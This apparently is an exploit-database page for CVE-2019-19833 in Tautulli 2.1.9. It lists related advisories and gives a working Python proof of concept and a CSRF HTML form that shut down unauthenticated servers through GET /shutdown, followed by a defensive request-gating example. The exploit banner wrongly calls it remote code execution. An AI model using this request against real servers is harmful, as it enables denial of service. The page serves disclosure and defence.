| Title | Published | Views | Family |
|---|---|---|---|
| Tautulli 2.1.9 - Denial of Service Exploit | 16 Jan 2020 00:00 | – | zdt |
| Exploit for Cross-Site Request Forgery (CSRF) in Tautulli | 1 Jan 2026 00:39 | – | githubexploit |
| CVE-2019-19833 | 19 Mar 2020 16:50 | – | circl |
| Tautulli Cross-Site Request Forgery Vulnerability | 18 Dec 2019 00:00 | – | cnvd |
| CVE-2019-19833 | 18 Dec 2019 17:08 | – | cve |
| CVE-2019-19833 | 18 Dec 2019 17:08 | – | cvelist |
| Tautulli 2.1.9 - Denial of Service (Metasploit) | 16 Jan 2020 00:00 | – | exploitdb |
| Tautulli 2.1.9 - Denial of Service (Metasploit) | 16 Jan 2020 00:00 | – | exploitpack |
| Tautulli v2.1.9 - Shutdown Denial of Service | 17 Jan 2020 10:57 | – | metasploit |
| CVE-2019-19833 | 18 Dec 2019 18:15 | – | nvd |
```text
# Exploit Title: Tautulli v2.1.9 - Cross-Site Request Forgery (ShutDown)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://tautulli.com/
# Software : https://github.com/Tautulli/Tautulli
# Product Version: v2.1.9
# Platform: Windows 10 (10.0.18362)
# Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
# Vulnerability Type : Cross-Site Request Forgery (ShutDown)
# Vulnerability : Cross-Site Request Forgery
# CVE : CVE-2019-19833
```

Description: in Tautulli v2.1.9 it was found that, on installations without a user login configured, the management endpoints can be reached anonymously, and the remote media server can be shut down.

Python script:

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests

# Banner as shipped with the PoC (whitespace was lost in extraction).
icon = """
_____ __ _ _ _____ _ _ _ _ _ _ _ ___ __ ___
|_ _/ \| || |_ _| || | | | | | | | \ / (_ | / |/ _ \
| || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
|_||_||_|\__/ |_| \__/|___|___|_| \_/ |___\/ |_\//_/
Unauthenticated Remote Code Execution
by Ismail Tasdelen
"""
print(icon)

# input() returns a string on Python 3 (on Python 2 use raw_input instead).
host = input("[+] HOST: ")
port = input("[+] PORT: ")

# Single unauthenticated GET to the management endpoint. The author notes
# that the restart and update_check commands are reachable the same way.
response = requests.get("http://" + host + ":" + port + "/shutdown")
if response.status_code == 200:
    print('[✓] Success!')
else:
    print('[✗] Unsuccessful!')
```

HTTP GET request:

```http
GET /shutdown HTTP/1.1
Host: XXX.XXX.XXX.XXX:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://XXX.XXX.XXX.XXX:8181/home
Upgrade-Insecure-Requests: 1
```

CSRF PoC HTML:

```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
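The defensive counterpart to the request shown above, as an added example that is not Tautulli's own code: a gate for state-changing management endpoints that enforces the three controls the PoC bypasses (an authenticated session, POST rather than GET, and a same-origin check on Sec-Fetch-Site / Origin / Referer). The host name, the `VALID_SESSIONS` store and the `gate` function are assumptions; the endpoint paths are the ones named in the PoC.

```python
"""Request gate for state-changing management endpoints (added example,
not Tautulli's own code). It models three defences against the issue
above: require a logged-in session, refuse GET for state changes, and
reject cross-site requests. Host, session store and function are
constructed for illustration."""
from urllib.parse import urlparse

APP_HOST = "tautulli.example.internal:8181"   # assumed host:port of the app
STATE_CHANGING = {"/shutdown", "/restart", "/update_check"}  # paths from the PoC
VALID_SESSIONS = {"s3ss10n-ok"}   # constructed stand-in for a session store


def gate(method, path, headers, cookies):
    """Return (allowed, reason) for one request; headers/cookies are dicts."""
    if path not in STATE_CHANGING:
        return True, "not a state-changing endpoint"
    # 1. Anonymous access is the CVE-2019-19833 root cause: demand a session.
    if cookies.get("session") not in VALID_SESSIONS:
        return False, "unauthenticated"
    # 2. A state change reachable by GET can be triggered by a plain link or
    #    the <form> in the PoC; require POST so a token/origin check applies.
    if method != "POST":
        return False, "state change must be POST"
    # 3. Modern browsers send Sec-Fetch-Site; anything but same-origin is
    #    a cross-site submission and is refused outright.
    fetch_site = headers.get("Sec-Fetch-Site")
    if fetch_site is not None and fetch_site != "same-origin":
        return False, "cross-site per Sec-Fetch-Site"
    # 4. Fall back to Origin (preferred) or Referer; a missing value is
    #    rejected rather than trusted, which is the strict stance.
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return False, "no Origin/Referer to verify"
    netloc = urlparse(source).netloc
    if netloc != APP_HOST:
        return False, f"origin mismatch: {netloc}"
    return True, "authenticated same-origin POST"


if __name__ == "__main__":
    # The PoC's own request: GET /shutdown with a same-host Referer, no cookie.
    poc_headers = {"Referer": "http://tautulli.example.internal:8181/home"}
    print(gate("GET", "/shutdown", poc_headers, {}))
    print(gate("POST", "/shutdown",
               {"Origin": "http://tautulli.example.internal:8181",
                "Sec-Fetch-Site": "same-origin"}, {"session": "s3ss10n-ok"}))
```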